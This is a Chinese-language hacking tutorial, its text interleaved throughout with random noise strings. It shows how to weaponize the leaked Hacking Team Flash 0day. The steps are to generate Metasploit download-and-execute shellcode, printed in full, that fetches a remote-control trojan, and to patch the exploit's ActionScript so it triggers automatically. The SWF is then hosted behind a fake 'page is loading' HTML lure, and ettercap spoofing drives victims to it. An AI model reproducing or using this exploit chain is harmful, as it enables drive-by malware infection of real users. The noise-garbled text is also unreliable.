& q2 ^ W# m4 t- [. m 三、flash 0day之手工代码修改制作下载者实例入侵演示
! w% K, q4 }7 E' Z9 ~+ b: E& p7 I - B) L! B5 A- Q9 V/ W
. O$ N. [% h3 V. l4 L9 r
利用到的工具:
4 U& g+ j6 Q/ q4 c4 i" O# w
6 B& M) ~) d7 Z1 ?8 B
) `- R7 d1 K# w* ~" K* D. X f Msf
( D( H) Q! A+ X+ C4 U7 ?5 \ r3 n % X4 g2 z) I5 i. f
4 o' T A$ H# j5 u Ettercap 0 v$ e( \" U) o" T9 V- r7 G0 k
- c9 i9 j: I9 H- w. i l" Z
) z/ d) ^2 y; Q8 K/ F
Adobe Flash CS6 - Q, M" K& Q c4 q
: V, {6 l& T% Y
$ T }" O0 E" @1 U9 r Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
7 [& Z8 J) A) y. N1 j
6 a2 |* u% Z2 }" m# }
8 C/ |1 m2 N- D7 [. k) F 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 2 N; T! ^6 K) m8 S8 H
8 E3 m+ ]; t% E4 E/ d
+ E4 S- U& f3 Z; n, V. d9 D
如图: ' [$ l4 ^( N7 z7 V) z4 B
- K8 I% \2 ~( P
& a' g1 s# F' W; G
+ f. |( G5 G+ i- }: v6 |; R7 O 7 W5 U; c, q& ]
1 w+ j0 ` D# k/ ^; N z : |* \1 P$ q1 i/ A/ p) Z1 r
( N0 J/ X. t- Y# R( S6 Z$ G% k" Q7 l! H. V7 M
然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
4 i. a& Z/ l/ K : }/ O+ U: W8 y
/ k. Z2 c1 I& ]; R0 T9 B7 q : n2 f, u8 H; C. ?: }, r
m; H. U2 z0 ~2 V
" Z5 |: ?) l: Z g, x
( a7 p$ H4 O$ d. S1 ~3 g `1 _8 q 1 W1 {, x& O+ m8 K( g
; |& i" R g- |. V# Y$ N
然后执行generate -t dword生成shellcode,如下: . H( i- W [! G& a- |, ?6 v
+ i( h5 Z8 A0 F
- l3 d( L, e& C8 Z" k
0 Y; R* h% J3 w8 b
( w6 h8 A8 v' d* t, T: @. j; f& R6 K- p9 F' Q. B
复制代码到文本下便于我们一会编辑flash exp,如下: . T( t- ^2 H6 \, c! _* g
2 C3 P" {1 L# z% W: m
5 z' K1 C3 Q2 t6 m! _ t+ V& F0 m 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, 0 m4 p# W' G ]
) Y; R X% F' i$ F; j
: M9 e6 \ }1 F# O$ p
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
- ~& T' r+ d/ g0 e% @ \! j% _
$ v* A; ]9 r. h% a% v
, W& j% P) b0 n" a 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
2 i% K6 v6 z0 h! x- ^0 ^& ? ' B; x$ J; i% }0 ~" n$ z
1 Q. Y( Q; M+ @$ U# ~, a( S
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
0 k+ u& W7 Y" p: d: J ' O4 x- M& d- w) [3 t
. M& @' E, y4 V0 p5 q9 u# i j7 [$ }$ ^' r
0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
V6 J' Q9 b2 R( Z& I
% n( _! }, Z0 J+ n0 @" E: Q6 b
D8 f" |: t- J* c; r) Z3 a0 D 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51,
& N- o- }6 p3 O' L* q, }
( E" t6 [4 E) m" u, K% m6 O$ n! H7 M8 [% ]
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e, 7 w' t% i, \. P; n
2 Z( I8 L' r$ O3 e3 ^
1 J2 P* `: {7 n# b& f# \ 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, % F- U( h. V% \% P/ m$ j
5 b* L: f' z$ l! s1 b
4 K6 X8 T8 W7 `( y# ^
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, , C+ u% I+ \! w7 N; C* g9 x* A6 Q! g' b
H5 [( W" e# s- Q$ h: Z* d9 P
' y3 _- `; J" ~6 G# Z/ e7 D+ q, R 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6, # Y) d- j1 p( X+ x5 F( Y4 v8 F
! z& P+ p+ G" z
) H/ O7 ~0 i/ E$ z" m* P$ m 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5,
. R% M+ K0 S; k" J, Q2 A
, R7 m' i& h4 T: T7 @0 w
6 k3 t2 R) _1 n* Z9 Q 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853,
9 w; T! @4 R) @5 j# ]# m 6 b5 p f8 f2 r
3 U9 ?4 o+ ^9 Q) g/ Y+ g- k: d: _
0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, - q5 ^5 o( ]3 `, m0 H4 A$ u! P2 c
( m5 V! s0 m) o4 Q& E5 y# Q
" W, b$ g2 U. |( K
0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 % v! y, w7 y) g! ~4 @: y) W
; R9 U5 S5 s. N( f7 H1 a( L
% V+ z% z0 m+ d4 [2 R5 I6 C 8 M. i% K0 S% s# {2 p5 ~1 X
2 w+ k+ O2 A% w$ {* y+ }
+ ]: o( p, F: \ & h+ u, ?' B6 t4 w6 M9 O+ _7 a
. ~# O S; v1 K' O4 a
9 z* L) |$ K2 O0 H6 }1 l& c
下面我们来修改flash 0day exp,需要修改三个文件,分别为:
! F) K- L1 i$ [* y1 E$ O 0 K: ]" X3 g- V" M' @
% d" e" @! S- a* ~3 g8 O1 {& R
6 p3 y$ o; [* H% B w
9 p2 U, P7 I. Z, g
9 C0 G7 [9 }) I3 f$ ^0 M 先修改ShellWin32.as,部分源代码如图: " |# V. v$ L7 G8 r. ~! l6 L
6 v+ s) t/ l( d! ]! I
1 w) M- ?, C2 e; C* a4 f 9 U. F& X' J, N- l9 }7 g) W! [7 e
! q% P" W! X" d0 U9 G& l
3 I" q# f8 F# V6 S 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下: 6 r U% z' ^0 ?# r+ A' n9 N0 I5 b
( s2 f- a8 G9 s- x$ j8 G0 t, \. }& M& X/ {
* ~+ f2 u V1 c; b$ V* o
! p1 g6 P+ D5 c7 n; [ 9 Z3 G3 l0 X' L% e9 u) P: }( z
& S( u3 {9 y: C# ?( u 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: ( M: ~( |% Y& d
! h8 @; {! o! f; p" Y8 Q+ Y
4 W- H( d5 Q: Y% W! b9 X
" G, r7 E8 e: l; V, i ) ~( j8 j3 S0 Q& f0 _
- _+ Q* B" x; _& V
换行在后面加一句TryExpl();注意是l不是数字1,然后如图: 4 O- @" A( n* Y; `2 P9 J! ^
) X% [3 K+ M" W' X8 J
2 [5 t3 C6 R- ?& j& | ! s; T, r ~4 T
* G: ~$ E3 `) o% Z% n' x$ q( s, @+ [
+ H1 m) {, r) `+ M9 w+ K " _, n+ p! R5 n6 W4 |2 G+ k
- i# _' `2 V# p) |3 R$ a
' B7 q: b+ v# x( A- c
( \1 X8 W" Y. W
# m. C/ m! K/ F5 A$ X 然后点保存,下面我们来编译一下,打开 / A9 w7 k6 K0 J! a# X; M
/ d* V; `' U! Z& v8 b5 u5 T* Z8 L/ P, X$ w) t. O% B( o
exp1.fla然后点文件-发布,看看编译没错误
' @4 i7 q! h! |2 D* W, [
' y& D! `9 \8 I* z7 [7 U5 [) Q! {6 b; a' o. E. p$ K
) k& C* _4 N! ^9 W, r$ B8 E3 B) q! n5 f 0 |7 O" E1 |+ z' L9 K% {
3 z8 S0 {" ]& i; w9 m
0 |8 E/ ^9 j7 _6 B$ O 4 ~' ]6 ~5 W5 g: l" [4 P
/ g& E7 |+ t4 Z. x+ ]0 G
0 W3 P9 i6 A" n, I
4 f# v9 u7 W# m( \, q& f" o! b
! B3 P! g8 I" ~% j
8 J# L3 ?. K6 `8 k6 Y/ w
3 b* q# ?* x, A y
" k/ o3 A! L: M 然后我们把生成的 : R5 R0 ^9 Q. q1 D3 S
" ?8 D v" z' K9 w
* }, D" D0 Y+ ^$ p6 i exp1.swf丢到kailinux 的/var/www/html下:
4 Y( p) y( B7 Z. P' ?6 V x) Y ; J: g2 ^7 m$ @9 n+ |- U# K2 j
" f/ W3 O# ]% q) }8 x. Z 然后把这段代码好好编辑一下 * @; l; q( z& z" N
; g2 y* U; V& U8 A+ r
2 F; o+ N6 m# S: c6 [) K
: c# F; b" |0 ?3 ^: X, ^! ^
( H3 C5 H2 }, c8 @
) [ ]6 @, l% l4 o H8 l* g0 X, V! n& u) [( T, T7 d
( O7 v7 A7 q$ B" C H" l3 m
: i5 ?, ^: {6 }' j+ _3 D8 v: \
# V2 @" e) y9 f6 |5 R
" n5 z* O$ j# g2 i, o5 F4 K
* |5 I- K% v1 H5 b9 o+ o
. ^1 v7 a$ R C 6 t; s8 J9 I( }+ g( k
. Z! W* c0 C4 p- d# n0 a- l6 f
( ?: J# j2 l/ w5 Q& @" {' C, h! E
0 c0 j a( y" Z# Z2 k$ o
6 s+ W/ d( \3 K6 e E/ K; D: I4 ~6 {
L' P; C" ~" h, y
2 K$ j' D7 s' p' j! k
<!DOCTYPE html>
6 n5 j' _7 L( k; ~
* n4 N& A6 w4 K% k& o
. g' d9 A- X8 E9 a* v& |( r <html> 7 Q- Y- {1 t/ y9 G
7 `8 n, J) c. @7 q
- C9 x1 C! x3 Y8 Y- m8 ?5 { <head>
! }/ X# @9 R" b2 i + R& Z9 A, E3 S3 Y: t
L+ `1 x. J8 a3 T4 ~! E8 W/ J; |' S <meta http-equiv="Content-Type" content="text/html; ( Z: Q+ B j$ ^" t
" Y. {- D7 S& r/ t9 ^4 |. b9 R9 w/ J6 Q/ p
charset=utf-8"/>
# {0 |- O, O! @, z# P0 x 7 p, K$ k' o+ C# A& w
0 `: k }# n# y
</head>
6 l3 l5 t$ l2 ^, {3 g 0 s% M" B7 Z0 S0 c) _$ {
3 J7 s9 F+ f" Y
<body>
& ?; I% E3 n- T + P: j5 Y+ W' n ~
$ h7 C: x7 r1 E
<h2> Please wait, the requested page is loading...</h2> / x4 V' I( n" n; V, V) ?3 W2 n) b
; R4 g5 |! ?3 E8 @) _' c6 w1 k" Z# u! p/ n: z
<br> % p8 H; k6 b D1 O
' H/ A7 u8 F8 v, m* G* X& h
2 P. d& N3 f4 a: J# |) J, D
<OBJECT
n0 _# y, K3 K/ O. U6 K( L
2 S9 h9 {4 J5 R4 P* i! ?1 s$ c
6 J6 W' k8 o/ |% C* F1 z classid="clsid27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4"><ARAM NAME=movie 4 o5 X0 v( M& W- x& ~; k
# B+ B" P( c! }* C2 q V4 q
% X( D/ C! f z, @4 P V VALUE="http://192.168.0.109/exp1.swf"></OBJECT> ' N/ e, C1 S: {5 `( U, ^1 @ T$ x0 ~2 x
. j. N' y& O6 I* U5 |+ K) [+ V: H) B% g
</body> + o+ C8 Q$ e y6 J
, R" R6 u4 b/ M3 F
1 n* v$ ?4 q s# D& \, l <script>
4 m8 _1 o9 `. z0 C+ p& C! E . X9 M; M1 i5 ~% o Z P( z7 o2 g
! {0 r" Y1 K7 n! a2 o4 e setTimeout(function () { $ \! ~1 g6 x$ B
! U3 y/ c8 I. b
% u' _2 m4 a4 W& u' ] ( Z' m1 [# Z( {" [4 L
6 B7 L0 _6 P" Z: A' c E0 i
Y7 H7 B1 k$ r0 S
window.location.reload(); 9 H; B4 L1 A* Q9 M b- R
& ~$ ~/ @8 o, L% `; j D* M) J/ e/ [8 Q' c, O
}, 10000);
7 {, K# W4 g9 t8 y 6 K! B5 x( J! u$ o( {
% Z, \( `" w7 B8 `* n1 P
2 V# K* X- Q$ W3 [ + Q8 B0 h' }# b
$ |% L* d2 {, u. ]7 u6 N% D
</script> 5 H6 Q2 r" u7 |, D# O& i# X
( p* Z: ^" r, r7 z. H u4 [& F! H+ N
</html> 9 x4 f* _- j0 i Z7 s
8 @5 e4 G" V- r7 A; s& u
7 M" H; p2 \& h( W4 [
n& D% P% x, g/ _( ` A, x* W: \4 n+ |
4 s: K4 v N4 c/ Q
/ m7 w: r* T, M6 r; ^& q 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: & p# ~; V* R& l- f& O: n
" j9 V5 `) P' a1 t; N! H
r$ d8 e3 ]) y
' X3 V6 ^) p9 [ # [/ I; a: r$ Y* G0 ^" u+ P' ~3 D
3 j2 `( L' b# J* B: W' l2 f
/ u+ ?& }$ P+ |3 G) L 3 N9 P4 }" M8 k. _
# n/ `5 m% D1 G9 s. N& a- U
' p, b# e# F) w/ s2 s" W1 U
+ w; j S, q0 y6 X2 a- S3 A" d- }) s. P( j
" i4 L. m* Y. z/ M
# y X' I! X1 f' b' V, U
* R# r/ o3 F- X% } s t" y3 B 7 B' Q+ S% y: e! F2 p; |) r
) Q6 L5 O2 I9 s. k0 I, z
( i- ^; P) T9 L; x 下面我们用ettercap欺骗如图:
4 E1 d* X( i# N: i% ~ 7 U: m1 v8 G0 V
) \+ t, y- s8 @& F2 N4 ?
& n9 q( {2 E/ R# r% w" t9 {) i8 C 3 b5 y# c6 L2 X, D/ u: ?
% B' Z0 J! W9 Y
" R0 W! M! x6 v
3 U" f* O3 P% O9 ]8 n
; n; }" o! ^3 i4 i 下面我们随便访问个网站看看: 3 H% P" [+ K4 G8 _ O
9 L( ?& N4 C! d8 p( z/ i/ }
* J7 i8 x5 l: F 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: Z- ?9 j3 Q1 y7 ~) t2 u1 L
& k- O. U# U0 ^2 b, E
$ F: c6 Q( p5 ^& ]7 |! i
8 \2 O% ~: w# O0 y* f8 N: R+ [
* a, w: r0 [& E, r9 b p$ s( N+ v9 P* k$ H6 t. V4 _1 P
我们看另一台,
7 y: a% {1 H7 c! r1 _+ H' J9 M9 Q
& P0 e1 l8 t# s/ e; Q9 L- T9 b! P- V
提示这个错误,说明木马是成功被下载执行了,只是由于某些原因没上线而已。。。
% e X8 n! [3 @5 H |